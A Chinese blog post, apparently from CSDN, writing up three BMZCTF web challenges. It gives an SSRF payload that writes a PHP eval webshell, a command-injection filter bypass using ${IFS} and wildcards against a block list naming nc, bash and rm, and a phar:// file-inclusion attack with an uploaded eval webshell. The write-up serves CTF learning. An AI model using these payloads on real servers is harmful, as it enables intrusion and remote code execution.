BMZCTF ssrfme 端午节就该吃粽子 pchar???

于 2023-03-27 19:04:16 发布
阅读量438 收藏
点赞数
分类专栏: ctf刷题纪 文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52268949/article/details/129801327
版权
ssrfme
<?php
if(isset($_GET) && !empty($_GET)){
    $url = $_GET['file'];
    $path = "upload/".$_GET['path'];
    
}else{
    show_source(__FILE__);
    exit();
}

if(strpos($path,'..') > -1){
    die('This is a waf!');
}

if(strpos($url,'http://127.0.0.1/') === 0){
    file_put_contents($path, file_get_contents($url));
    echo "console.log($path update successed!)";
}else{
    echo "Hello.Geeker";
}

进入环境给出了源码,首先判断有没有通过GET方式传入一个值,如果传入且是给file,path传的值,就将file值保存到 u r l 中, p a t h 值和 " u p l o a d / " 拼接存入 url中,path值和"upload/"拼接存入 url中,path值和"upload/"拼接存入path中,如果没有通过GET方式传入值那么就高亮显示代码,然后判断我们输入的字符中有没有…如果有就输出’This is a waf!'并退出程序,然后通过strops函数比较传入的file开头是否以http://127.0.0.1/开头,没有的话就输出Hello.Geeker,如果有就包含path传入的url,并显示路径。简单构造一下payload

?file=http://127.0.0.1/?file=http://127.0.0.1/&path=<?php eval($_POST['shell']);?>&path=3.php

默认情况下,浏览器会对特殊字符进行url编码,所以php默认就会对解析后的参数进行url解码,注意是对解析后的。空格等特殊字符如果不进行编码,服务器在处理的时候可能出现问题,通过浏览器的方式访问的话,空格会自动编码为%20或者+,但我们通过上述方法嵌套参数,让服务器自己去请求http的时候就会出现问题,解决方法是进行二次编码。因为第二点说了web服务器默认就会对解析后的参数进行url解码,所以php最开始解析我们的参数时进行了一个解码,服务器通过http伪协议去访问时又会对解析后的参数进行一次解码,所以我们可以进行二次编码

#将其中一个&进行url编码,让服务器成功解析出两个参数
?file=http://127.0.0.1/?file=http://127.0.0.1/%26path=<?php eval($_POST['shell']);?>&path=3.php
#对整个一句话进行二次编码,免得别的字符影响结果
?file=http://127.0.0.1/?file=http://127.0.0.1/%26path=%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%36%35%25%37%36%25%36%31%25%36%63%25%32%38%25%32%34%25%35%66%25%35%30%25%34%66%25%35%33%25%35%34%25%35%62%25%32%37%25%37%33%25%36%38%25%36%35%25%36%63%25%36%63%25%32%37%25%35%64%25%32%39%25%33%62%25%33%66%25%33%65&path=3.php

成功rce
在这里插入图片描述

然后我们找flag即可
在这里插入图片描述

端午节就该吃粽子

题目如下让我们访问login.php
在这里插入图片描述
然后就一个登录界面查看源码发现index.php

在这里插入图片描述

我们直接访问发现没有结果使用伪协议读取

在这里插入图片描述

然后我们使用base64解密

<?php
error_reporting(0);
if (isset($_GET['url'])) {
  $ip=$_GET['url'];
  if(preg_match("/(;|'| |>|]|&| |python|sh|nc|tac|rev|more|tailf|index|php|head|nl|sort|less|cat|ruby|perl|bash|rm|cp|mv|\*)/i", $ip)){
      die("<script language='javascript' type='text/javascript'>
      alert('no no no!')
      window.location.href='index.php';</script>");
  }else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
      die("<script language='javascript' type='text/javascript'>
      alert('no flag!')
      window.location.href='index.php';</script>");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo $a;
}
?>

发现有两个正则需要绕过,构造payload

?url=127.0.0.1|ca\t${IFS}/????

|拼接执行指令\绕过对cat的匹配${IFS}绕过对空格的匹配,???绕过对flag的匹配这样就能成功拿下flag
在这里插入图片描述

pchar???
补充知识点

开始这题之前我们先补充一个知识点

phar 的文件包含
和上面类似先创建一个phar 标准包,使用 PharData 来创建,然后添加文件进去phar里面。
然后在文件包含的函数里面 可控的话 ,使用phar://xxxx/xxx 就可以实现文件包含了

解题

进入题目查看源码发现一个界面我们去访问看一下

在这里插入图片描述

然后我们在include.php中查看源码又发现一个页面upload.php

在这里插入图片描述

两个页面访问结果如下

在这里插入图片描述

在这里插入图片描述

估计是通过upload.php上传的内容然后通过include.php包含进来,我们先来试试文件包含

在这里插入图片描述

基本确定是文件包含了但是他会在你输入的文件名后面+.php

既然这样那我们尝试使用php://filter/协议读取源码试试

include.php?file=php://filter/convert.base64-encode/resource=include

将源码读出我们进行base64解码得到如下源码

<html>
Tips: the parameter is file! :) 
<!-- upload.php -->
</html>
<?php
    @$file = $_GET["file"];
    if(isset($file))
    {
        if (preg_match('/http|data|ftp|input|%00/i', $file) || strstr($file,"..") !== FALSE || strlen($file)>=70)
        {
            echo "<p> error! </p>";
        }
        else
        {
            include($file.'.php');
        }
    }
?>

这里发现过滤掉了http,data,ftp,input,%00,…并且长度不能大于70

然后我们再去读一下upload.php

<form action="" enctype="multipart/form-data" method="post" 
name="upload">file:<input type="file" name="file" /><br> 
<input type="submit" value="upload" /></form>

<?php
if(!empty($_FILES["file"]))
{
    echo $_FILES["file"];
    $allowedExts = array("gif", "jpeg", "jpg", "png");
    @$temp = explode(".", $_FILES["file"]["name"]);
    $extension = end($temp);
    if (((@$_FILES["file"]["type"] == "image/gif") || (@$_FILES["file"]["type"] == "image/jpeg")
    || (@$_FILES["file"]["type"] == "image/jpg") || (@$_FILES["file"]["type"] == "image/pjpeg")
    || (@$_FILES["file"]["type"] == "image/x-png") || (@$_FILES["file"]["type"] == "image/png"))
    && (@$_FILES["file"]["size"] < 102400) && in_array($extension, $allowedExts))
    {
        move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $_FILES["file"]["name"]);
        echo "file upload successful!Save in:  " . "upload/" . $_FILES["file"]["name"];
    }
    else
    {
        echo "upload failed!";
    }
}
?>

这里采用白名单过滤的方法进行文件上传再根据题目名称为phar我们来试试

首先我们写一个

<?php phpinfo();?>

然后我们将这个php文件压缩成zip的压缩包

在这里插入图片描述

之后将zip压缩包的后缀改为.jpg然后进行上传

在这里插入图片描述

上传成功然后我们使用phar进行文件包含

http://www.bmzclub.cn:23627/include.php?file=phar://upload/1.jpg/1

在这里插入图片描述

成功执行下面我们将phpinfo改为木马即可

<?php
	echo "hack!";
	eval($_REQUEST[cmd]);
?>

在这里插入图片描述

上传成功,下面我们使用hackbar执行指令即可

在这里插入图片描述

听门外雪花飞
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
文件包含&PHP伪协议利用
菜鸟耿耿
09-16 5061
文件包含 文件包含漏洞是“代码注入”的一种。其原理就是注入一段用户能控制的脚本或代码,并让服务端执行。“代码注入”的典型代表就是文件包含。 要想成功利用文件包含漏洞进行攻击,需要满足以下两个条件: Web应用采用include()等文件包含函数通过动态变量的方式引入需要包含的文件; 用户能够控制该动态变量。 常见的导致文件包含的函数: PHP:include()、include_once()、require()、require_once()等; 1.php文件包含可以直接执行包含文件的代码,包含的文件格
bmzctf端午就该粽子
qq_46540840的博客
07-14 319
命令执行常用到的函数 system() :有回显 passthru() shell_exec() `` :无回显 cat 替换 nl more tac less 小技巧 ​ 我们可以用 %09,${IFS}代替空格 ,当flag 被过滤时可以用 正则表达式来代替 端午就该粽子 回到题目 发现zhongzi参数可空 -> 文件包含漏洞 直接用伪协议php://filter/read=convert.base64-encode/resource=index.ph
【反序列化漏洞01】序列化与反序列化简介
Fighting_hawk的博客
03-19 4697
1. 了解序列化与反序列化的作用; 2. 掌握PHP中序列化与反序列化的使用方法。
CTF WEB练习
qq_45781155的博客
01-28 233
hctf_2018_warmup <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_s
浅谈CSRF攻击方式(转)
weixin_34090643的博客
07-08 1735
浅谈CSRF攻击方式 一.CSRF是什么?   CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。 二.CSRF可以做什么?   你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做的事情包括:以你名义发送邮件...
Delphi String类型和PChar类型使用的区别.rar
07-10
Delphi 以实例演示String类型和PChar类型使用的区别,演示了PChar静态分配空间和PChar动态分配空间:  procedure TForm1.Button1Click(Sender: TObject);  var  PStr:array [0..100] of Char;  begin  StrPCopy...
pchar-1.5.tar.gz
11-04
PChar类似于pathchar,试图通过沿一个终端到端到端路径表征互联网的带宽,时延,链路损耗。 它已经过测试各种版本的FreeBSD,NetBSD的,OpenBSD的,LINUX,Solaris和OSF / 1和IRIX,FreeBSD和Solaris。最近增加PChar...
delphi中String,PChar,PByte,Array of Char,Array of Byte 互相转换
07-21
delphi中String,PChar,PByte,Array of Char,Array of Byte 之间的互相转换
微信、支付宝示例C#.rar
09-16
`Pchar`在C#中通常表示为`StringBuilder`或`IntPtr`类型,用于传递字符串到原生函数。在微信和支付宝的支付过程中,可能需要使用P/Invoke调用底层接口来完成特定操作。 5. **C#示例代码**: 压缩包中的"C#示例"很...
Delphi 根据文件名中的部份名称打开该文件.rar
07-10
Delphi 根据文件名中的部份名称打开该文件,根据部分文件名,并不是需要很精确的路径就可以打开文件,仔细看一下,打开文件是基于ShellExecute,以下为示例代码:  ShellExecute(Handle, 'Open', pchar(yourPath '\...
端午节为什么要粽子.doc
09-15
端午节为什么要粽子.doc
ssrfme
o3Ev的博客
05-02 384
ssrfme 题目: 打开环境,得到: <?php if(isset($_GET) && !empty($_GET)){ $url = $_GET['file']; $path = "upload/".$_GET['path']; }else{ show_source(__FILE__); exit(); } if(strpos($path,'..') > -1){ die('This is a waf!'); } if(
sycsec的一道审计题目
一个码农的笔记
10-31 3049
首先题目给出了源代码 <?php if(isset($_GET) && !empty($_GET)){ $url = $_GET['file']; $path = "upload/".$_GET['path']; }else{ show_source(__FILE__); exit(); } if(strpos($path,'..') > -1){
PHP的各种安全问题总结 一文了解PHP的各类漏洞和绕过姿势
闵行小鱼塘
11-26 3540
尽可能全面的总结PHP的各种安全问题:基础知识、弱类型及各种函数、伪协议、反序列化、其他,本篇持续更新
PHP 代码注入知识点总结
千寻的博客
02-10 2096
文章目录第一章 概述第一节 原理以及成因第二节 形成原因第三节 漏洞危害第二章 相关函数和语句第一节 eval()第二节 assert()第三节 preg_replace()第四节 call_user_func()第六节 动态函数`$a($b)`第三章 漏洞利用第一节 直接获取Shell第二节 获取当前文件的绝对路径第三节 读文件第四节 写文件第四章 防御方法 第一章 概述 第一节 原理以及...
2017 0ctf char writeup
【xiaoxiaorenwu's blog】
04-13 904
首先提供题目的二进制文件2017-0ctf-char。 预览: 拿到题目先预览,发现程序为32位且保护很少,估计应该是堆题,运行一下发现程序似乎很简单。。。放进ida看一下反汇编码,发现程序确实不难,但是有几个需要注意的地方。 我们可以看到程序将libc通过mmap()映射到了固定的0x5555e000处,这等于我们不需要泄露libc就可以确定函数和gadgets的真实地址,带来了极大的方便。比...
CTF-中文件上传(2)
欢迎来到神林的博客
04-18 7288
0x00:二次渲染 今天上午刚刚结束的DDCTF真的是让人脑壳很大,除了膜拜一波大佬之外,还get到了很多的新知识: 文件上传中,大部分题目回绕求我们上传图片格式,而我们就会伪造一些图片绕过验证,一些简单的前端验证还有一些服务器端的验证,都是比较简单的,但是有的时候就会涉及到比较困难的知识点,比如今天要说的:二次渲染 所谓二次渲染: 就是根据用户上传的图片,新生成一个图片,将原始图片删除,将新图片...
X-NUCA 2017 Web练习 By Assassin
Assassin
08-21 2764
还差一个 题目链接如下 http://www.hetianlab.com/pages/activity/X-NUCANationalTL2017.jsp捉迷藏一看发现一大坨东西,但是都没用发现有一个链接 打开隐约会闪一下回到index.php,说明是个重定向,burp抓包得到flag FLAG{th!5!5n0tth3fl@g}简单问答真是搞不懂这题是几个意思…首先看到页面,貌似是个简答
SWPU 2016 web 部分思路整理
Bendawang's Blog
11-01 4042
SWPU 2016 web 部分思路整理
Delphi的PChar如何使用?如何将字符串转为PChar
最新发布
07-14
在Delphi中,PChar是指向以null结尾的字符数组的指针。它常用于与C语言库或API进行交互。要将字符串转换为PChar,可以使用以下方法: 1. 使用StrPCopy函数: ```delphi var str: string; p: PChar; begin str := 'Hello, World!'; GetMem(p, Length(str) + 1); // 为PChar分配内存 try StrPCopy(p, str); // 将字符串复制到PChar // 使用PChar进行操作 finally FreeMem(p); // 释放PChar的内存 end; end; ``` 2. 使用StrPLCopy函数: ```delphi var str: string; p: PChar; begin str := 'Hello, World!'; GetMem(p, Length(str) + 1); // 为PChar分配内存 try StrPLCopy(p, str, Length(str)); // 将字符串复制到PChar // 使用PChar进行操作 finally FreeMem(p); // 释放PChar的内存 end; end; ``` 这些函数将字符串复制到PChar,并确保PChar以null结尾。使用完PChar后,不要忘记释放内存,以免造成内存泄漏。 希望对你有所帮助!如果你有任何进一步的问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值